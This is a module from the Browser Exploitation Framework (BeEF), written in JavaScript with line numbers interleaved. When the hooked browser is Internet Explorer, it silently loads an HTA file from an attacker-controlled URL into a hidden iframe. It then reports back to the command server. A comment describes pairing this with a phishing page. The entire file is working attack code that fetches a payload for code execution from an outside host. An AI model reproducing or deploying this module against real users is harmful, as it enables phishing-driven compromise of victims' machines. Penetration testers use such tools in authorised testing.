1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function(){
8

9
    var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';
10

11
    if (beef.browser.isIE()) {
12
        // application='yes' is IE-only and needed to load the HTA into an IFrame.
13
        // in this way you can have your phishing page, and load the HTA on top of it
14
        beef.dom.createIframe('hidden', {'src': hta_url, 'application': 'yes'});
15
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'HTA loaded into hidden IFrame.');
16
    }
17
});
18

19